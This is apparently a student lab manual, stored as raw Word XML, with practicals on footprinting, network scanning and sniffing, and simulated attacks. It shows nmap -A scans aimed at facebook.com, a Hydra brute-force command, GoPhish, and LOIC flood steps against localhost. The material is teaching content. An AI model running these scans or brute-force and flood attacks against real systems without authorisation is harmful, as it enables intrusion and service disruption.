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1BB2B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Prac 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Use software tools/commands to perform footprinting /information gathering and generate analysis report.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="9336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3"/>
        <w:gridCol w:w="2279"/>
        <w:gridCol w:w="2783"/>
        <w:gridCol w:w="2221"/>
      </w:tblGrid>
      <w:tr w14:paraId="6AD63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08" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18C8FC8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2249" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="718CB6F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Where Performed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2753" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E54C99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Command / How to Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2176" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55C7BE2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Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5D404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08" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37BD2CF3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WHOIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2249" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F7247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Online Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2753" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E3D83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whois.com → enter </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>facebook.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2176" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68DC0F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Domain details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="33534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08" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="050B0B5A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nslookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2249" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13BF277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Windows CMD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2753" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="275969F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nslookup facebook.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2176" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C4377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IP address, Name Servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="16001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08" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C2DDE9E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DNS Lookup Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2249" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26C2056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Online Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2753" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C5513A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dnschecker.org → DNS Lookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2176" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66DF0CE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A, MX, NS, TXT records</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="68E26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08" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CF21811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Traceroute (tracert)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2249" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E92022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Windows CMD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2753" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="126901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tracert facebook.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2176" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="616132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Hop-by-hop path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="65A91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08" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="507976B2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Nmap (Windows Version)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2249" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5ECB758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Windows (after installing Nmap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2753" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E67FD2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nmap -A facebook.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2176" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="366898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 ports, services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="52FA9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08" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23103BC7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Email Finder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2249" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40D2103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Online Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2753" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55C40B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hunter.io → search </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>facebook.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2176" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D0990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Public email IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="20EC5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08" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="724C4F94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Subdomain Finder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2249" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7495E32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Online Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2753" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3537B80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subdomainfinder.c99.nl → enter domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2176" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="359B467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Subdomains list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="31F42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08" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25B390C3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 Fingerprinting (Wappalyzer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2249" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74C53F1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Browser Extension (Chrome/Firefox)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2753" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E121C5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 facebook.com → click Wappalyzer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2176" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27D503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Technology info (server, frameworks, CMS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A43D235">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="361ADA31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Prac 2: Use software tools/commands to perform network scanning and sniffing and generate analysis report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676DA9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1: NETWORK SCANNING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75057D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Used (NO Kali Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB3AD0A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Nmap (Windows Version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E024C3E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Windows CMD Tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – arp, netstat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B9AD37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Online Port Scanners</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – (Pentest-Tools, IPVoid, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2636CF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1. Nmap Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC253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Where Performed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0A9A68">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Windows (Install "Nmap for Windows")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD295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Command 1 – Simple Port Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBD0904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nmap 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0FB1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Command 2 – Service Version Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2991E8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nmap -sV 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CF76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Command 3 – OS Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F0CBD5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nmap -O 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C86E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Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21466F6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0"/>
          <w:between w:val="single" w:color="auto" w:sz="4" w:space="1"/>
        </w:pBd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PORT     STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262C2A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0"/>
          <w:between w:val="single" w:color="auto" w:sz="4" w:space="1"/>
        </w:pBd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22/tcp   open  ssh     OpenSSH 7.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0765061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0"/>
          <w:between w:val="single" w:color="auto" w:sz="4" w:space="1"/>
        </w:pBd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80/tcp   open  http    Apache 2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A7A6C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0"/>
          <w:between w:val="single" w:color="auto" w:sz="4" w:space="1"/>
        </w:pBd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443/tcp  open  https   nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB5F4E3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Device type: router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577E1739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OS details: Linux 3.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4DC0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2. Online Port Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CE4E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Where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AB3308">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Browser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Tool:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pentest-tools.com → Port Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D18A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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C4E794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Open Ports: 80, 443, 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7359BDFF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Services: HTTP, HTTPS, Web Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DAD2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3. Netstat (Windows Built-in)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C4A4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Where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D9733C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Windows CMD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2698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Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA97002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netstat -an</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023ADF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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2793BB59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TCP 0.0.0.0:80     LISTENING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C22F4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TCP 192.168.1.5:443 ESTABLISHED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A5E1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4. ARP Scan (Windows Built-in)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BC62F9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Shows devices connected on same network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712DCC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Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0503FB73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arp -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D20A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Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F9D6A8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168.1.1   00-1a-2b-33-44-55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C921BB6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168.1.10  34-b1-aa-77-21-19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A7708E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3E05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2: NETWORK SNIFFING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3254F8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 Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7E8D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Wireshark (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3519C5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1. Capture Live Packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CCED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Where Performed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C00DA2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Wireshark (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD7DA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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DE2BEF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Open Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6748751F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Select network interface (Wi-Fi/Ethernet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B59ADCE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Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Start Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6D9B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2. Apply Filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F01A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HTTP Traffic Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B404C5D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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBE60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DNS Traffic Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E861C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dns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EBAF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TCP Traffic Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB3A920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tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096C13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Sniffed Packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123EB8DE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Source: 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B46E9C1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Destination: 157.240.20.35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A824111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Protocol: HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537B7192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Info: Client Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C0D1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3. Analyse Packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1F84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You can check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D301032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Source IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EA23BC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Destination IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C69A769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Protocol used (TCP, UDP, DNS, HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C481EE4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Ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B676A7A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Time stamps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496CD4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4. Stop Capture &amp; Save File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F17F79D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>File → Save As → .pcapng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEB7BC2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A529588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  <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Prac 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Use software tools/commands to perform malware attacks and other cyber attacks and generate analysis report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2567C7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1 – Malware Analysis (Static Scan using VirusTotal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19602D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1: Upload sample to VirusTotal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CA757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Tool:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> VirusTotal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Where:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Browser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Action:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Upload a harmless EICAR test malware file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0709BF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(example):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFB1D12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File Name: eicar.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B970A11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Detection Ratio: 58/62</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C69EF70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Type: Test Malware (EICAR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47137D8B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Capabilities: No real damage, used for antivirus testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C41F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008A84F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>VirusTotal analyzes the file with 60+ antivirus engines.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The file is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>not dangerous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> but helps demonstrate how malware gets flagged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1A97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PART 2 – Ransomware Attack Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6031BD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Tool: WannaCry Ransomware Simulator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4CF84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Where Performed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows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Command/Execution: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Double-click → "WannaCrySimulator.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DEDD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Screenshot-style:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEAC368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[Simulation Started]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F576856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Scanning files...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074A993E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Encrypting sample documents...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E58583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Displaying ransom note...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273FCFF4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Simulation Complete (No real data was harmed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561983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33CEE348">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The simulator shows how ransomware encrypts files and creates ransom notes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without harming the system. Helps understand ransomware behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F20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PART 3 – Brute Force Attack Simulation (Password Cracking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391747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Tool: THC-Hydra (Windows version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1CA63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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F22A3D0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hydra -l admin -P passwords.txt ftp://127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF356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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683B00BB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[80][ftp] host: 127.0.0.1   login: admin   password: tiger123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A97E53E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1 valid password found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704257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4AEC296B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hydra brute-forces a local FTP test server and finds a weak password.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Shows the importance of strong passwords without attacking real systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FDD3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PART 4 – Phishing Simulation (GoPhish)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04956F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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DA2E42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gophish.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142DA0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57D9D14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[+] Server started at http://127.0.0.1:3333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFFD73E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[+] Campaign Created: Fake Email Login Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F12A3C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[+] Status: Emails Delivered (Simulation Only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EE08ED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[+] Click Rate: 40%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD950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51BA36B7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GoPhish simulates phishing email delivery and tracks click-rates safely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD1F6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PART 5 – DDoS Simulation (LOIC Offline Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DFF08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Purpose:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Demonstrate packet-flood generation WITHOUT targeting real servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C37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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7E8189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Open LOIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3C2EB9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Enter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (local machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D953C3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Click "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Attack (Offline Simulation Mode)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066F30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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A5E9A8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Packets Sent: 20,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6201D5D4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Attack Mode: TCP/UDP Flood</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B751355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Target: 127.0.0.1 (Local)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5573A49B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No damage (simulation)</w:t>
      </w:r>
    </w:p>
